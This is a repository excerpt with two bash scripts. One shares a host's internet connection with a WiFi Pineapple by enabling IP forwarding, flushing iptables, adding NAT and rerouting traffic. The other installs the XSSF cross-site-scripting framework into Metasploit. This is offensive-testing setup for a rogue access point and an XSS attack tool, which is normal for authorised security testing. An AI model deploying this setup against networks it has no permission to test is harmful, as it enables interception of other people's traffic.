35 | 36 | temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default 37 | echo -n "Internet Gateway [$temppineapplegw]: " 38 | read pineapplegw 39 | if [[ $pineapplegw == '' ]]; then 40 | pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default 41 | fi 42 | 43 | echo -n "IP Address of Host PC [172.16.42.42]: " 44 | read pineapplehostip 45 | if [[ $pineapplehostip == '' ]]; then 46 | pineapplehostip=172.16.42.42 #IP Address of host computer 47 | fi 48 | 49 | echo -n "IP Address of Pineapple [172.16.42.1]: " 50 | read pineappleip 51 | if [[ $pineappleip == '' ]]; then 52 | pineappleip=172.16.42.1 #Thanks Douglas Adams 53 | fi 54 | 55 | #Display settings 56 | #echo Pineapple connected to: $pineapplelan 57 | #echo Internet connection from: $pineapplewan 58 | #echo Internet connection gateway: $pineapplegw 59 | #echo Host Computer IP: $pineapplehostip 60 | #echo Pineapple IP: $pineappleip 61 | #echo Network: $pineapplenet 62 | #echo Netmask: $pineapplenetmask 63 | 64 | echo "" 65 | echo "$(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)\||/$(tput sgr0) Internet: $pineapplegw - $pineapplewan" 66 | echo "$(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3),<><>,$(tput sgr0) Computer: $pineapplehostip" 67 | echo "$(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)'<><>'$(tput sgr0) Pineapple: $pineapplenet - $pineapplelan" 68 | 69 | 70 | #Bring up Ethernet Interface directly connected to Pineapple 71 | ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up 72 | 73 | # Enable IP Forwarding 74 | echo '1' > /proc/sys/net/ipv4/ip_forward 75 | #echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " 76 | #cat /proc/sys/net/ipv4/ip_forward 77 | 78 | #clear chains and rules 79 | iptables -X 80 | iptables -F 81 | #echo iptables chains and rules cleared 82 | 83 | #setup IP forwarding 84 | iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT 85 | iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 86 | iptables -A POSTROUTING -t nat -j MASQUERADE 87 | #echo IP Forwarding Enabled 88 | 89 | #remove default route 90 | route del default 91 | #echo Default route removed 92 | 93 | #add default gateway 94 | route add default gw $pineapplegw $pineapplewan 95 | #echo Pineapple Default Gateway Configured 96 | 97 | #instructions 98 | #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan 99 | 100 | #ping -c1 $pineappleip 101 | #if [ $? -eq 0 ]; then 102 | #echo "ICS configuration successful." 103 | #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" 104 | #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" 105 | #echo "Enter Pineapple password if prompted" 106 | #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' 107 | #fi 108 | 109 | echo "" 110 | echo "Browse to http://$pineappleip:1471" 111 | echo "" 112 | -------------------------------------------------------------------------------- /xssf.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | msfupdate 3 | cd /opt/metasploit/apps/pro/msf3 4 | svn export http://xssf.googlecode/svn/trunk ./ --force 5 | --------------------------------------------------------------------------------